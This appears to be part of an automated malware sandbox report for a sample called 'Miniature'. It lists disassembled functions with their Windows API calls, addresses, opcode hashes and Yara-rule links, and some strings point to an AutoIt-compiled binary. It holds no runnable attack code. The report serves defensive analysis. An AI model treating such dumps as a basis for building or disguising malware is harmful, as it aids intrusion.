                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                                                                                                                                                                            • String ID: GetSystemWow64DirectoryW$X64$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 582185067-2904798639
                                                                                                                                                                                                                                                                                            • Opcode ID: 97a4f215ae38241b598684d0429db606961a4fcc6a0dec18e5ea84fae86be347
                                                                                                                                                                                                                                                                                            • Instruction ID: ffd6b0e5aafb1a737f4fda10ec56e5c3ae39f8cdc6b05e95615b5abbe4d35535
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97a4f215ae38241b598684d0429db606961a4fcc6a0dec18e5ea84fae86be347
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20F0BE79912239DBD6759B64CCC8FAE32286B22B05F1500A6F603E2490DB70CE048A51
                                                                                                                                                                                                                                                                                            Function 00C7F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5048fb7a093b7a55c87eb16c4d68a43aaf376288a39520b34397e1f25a79d7bf
                                                                                                                                                                                                                                                                                            • Instruction ID: 768c7f55de336d17fc23f6ab36be27df5ac4713b1023ad0d5dc2012a18927f9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5048fb7a093b7a55c87eb16c4d68a43aaf376288a39520b34397e1f25a79d7bf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD419165C21214B5CB15EBB8DC8BACFB7B8AF05310F508866F519E3121FA34E256C3A6
                                                                                                                                                                                                                                                                                            Function 00C2FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00C2FC41
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00C6FC15
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C539E2,00000004,00000000,00000000), ref: 00C6FC98
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ShowWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 95ba10ae240c2d6bc7a7ace68cac7c5a16cfd197d3c5195f2a1277dc9711bb22
                                                                                                                                                                                                                                                                                            • Instruction ID: 87ecdfb21cb2e9f07fce0c3afa9b231e3e902221eed83024872ecdf8ee693cd5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95ba10ae240c2d6bc7a7ace68cac7c5a16cfd197d3c5195f2a1277dc9711bb22
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941273060839CAAC7398B39E9D8B7E3FB5AB87310F14453CE96757E60C671A982D711
                                                                                                                                                                                                                                                                                            Function 00CA379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CA37B7
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00CA37BF
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CA37CA
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00CA37D6
                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CA3812
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CA3823
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CA6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00CA385E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CA387D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f29131a47f6979105dc7339016540e5c6a477c145fdb6b65a7935879fe80a92b
                                                                                                                                                                                                                                                                                            • Instruction ID: 416ff6b996306348c36e175548a7350565cc41edcf50982d3736b2b8fe568eab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29131a47f6979105dc7339016540e5c6a477c145fdb6b65a7935879fe80a92b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F319C72201214BFEB158F50CC89FEB3BA9EF4A759F044065FE0ADB291C6B59D41C7A0
                                                                                                                                                                                                                                                                                            Function 00C95A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                            • Opcode ID: 11f28be3b705b339a6b715fab8d6e89ce4c242c81f4e3dd07a842521b84781c8
                                                                                                                                                                                                                                                                                            • Instruction ID: 384a73e75d7982f10138a6a5d9838daf1b9cd8e21869e52d4d35f0229103a723
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11f28be3b705b339a6b715fab8d6e89ce4c242c81f4e3dd07a842521b84781c8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70D1A171A0070AAFDF11CF68C889BAEB7B5FF48314F148569E915AB281E770EE45CB50
                                                                                                                                                                                                                                                                                            Function 00C518A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C5194E
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C519D1
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C51B7B,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51A64
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51AF7
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C51B22
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C51B2E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4a6cfb50d5f25ef62d952911810cf49bcc10a6ea9e7ef81c5e91538bd4df3c56
                                                                                                                                                                                                                                                                                            • Instruction ID: de892247353045d1e3e701633ac51a1a7ce1b6f34b95a6ab47c704b6fb5c8373
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a6cfb50d5f25ef62d952911810cf49bcc10a6ea9e7ef81c5e91538bd4df3c56
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C291E47AE002569BDB218E65C899BEE7BB5EF09311F1C0219EC21E7180E735DEC8C764
                                                                                                                                                                                                                                                                                            Function 00C94F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                            • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ce0020b6d5b99b91de549f5c35ea7e8e1f9114be9fe1f5c3242792f7d4a2f9b
                                                                                                                                                                                                                                                                                            • Instruction ID: decdce86a40caafb93f3ca4f3c2b8426fac30112fc610a0a46ca6b12a257c997
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ce0020b6d5b99b91de549f5c35ea7e8e1f9114be9fe1f5c3242792f7d4a2f9b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C91BE71A00619ABCF25CFA5CC88FAFBBB8EF45714F10855AF515AB280D7709A45CFA0
                                                                                                                                                                                                                                                                                            Function 00C81B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C81C1B
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81C43
                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00C81C67
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81C97
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81D1E
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81D83
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81DEF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                            • Opcode ID: de389f8e8565dcf6f8f854d90163dffe0a6d0e860f0d3e1b601cdddf3a6e2d7e
                                                                                                                                                                                                                                                                                            • Instruction ID: 8fda64500cb93570603d6d3f44743c9abb90b0099fc3251be023e118a9bd268f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de389f8e8565dcf6f8f854d90163dffe0a6d0e860f0d3e1b601cdddf3a6e2d7e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5291EF71A00219AFDB01AF94C884BBEB7F8FF05719F18402AED51EB291D774AD42DB94
                                                                                                                                                                                                                                                                                            Function 00C943A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C943C8
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C944D7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C944E7
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C9467C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8169E: VariantInit.OLEAUT32(00000000), ref: 00C816DE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8169E: VariantCopy.OLEAUT32(?,?), ref: 00C816E7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8169E: VariantClear.OLEAUT32(?), ref: 00C816F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                            • Opcode ID: e16604bc7ce54418c67c01e02c8a32b0746939c68c21d59948eaef4bc2d81f9d
                                                                                                                                                                                                                                                                                            • Instruction ID: 471b4eed5990a0c8f7ce3aaa3a5e0d22dff8adf49c041de30688e5195696fb76
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e16604bc7ce54418c67c01e02c8a32b0746939c68c21d59948eaef4bc2d81f9d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A9168746083019FCB08EF64C48496AB7E5FF89714F14892DF89A9B351DB31ED46DB82
                                                                                                                                                                                                                                                                                            Function 00C9560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?,?,00C70C4E), ref: 00C7091B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70936
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70944
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?), ref: 00C70954
                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C956AE
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C957B6
                                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C9582C
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00C95837
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                            • Opcode ID: 4d15f87975ab20c296d1680765686d527a3d3aa4bab5577fc9ef80ab3f9e069b
                                                                                                                                                                                                                                                                                            • Instruction ID: a76f3e04f3c95dd32941ab2f238f4ff6943a350bb1a06f065faecf6c2a374b60
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d15f87975ab20c296d1680765686d527a3d3aa4bab5577fc9ef80ab3f9e069b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB912671D00219EFDF15DFA4D885AEEBBB9BF08304F10416AE915A7291EB309E45DFA0
                                                                                                                                                                                                                                                                                            Function 00CA2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenu.USER32(?), ref: 00CA2C1F
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00CA2C51
                                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CA2C79
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA2CAF
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00CA2CE9
                                                                                                                                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00CA2CF7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C743AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetCurrentThreadId.KERNEL32 ref: 00C743B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C72F00), ref: 00C743BB
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA2D7F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7F292: Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
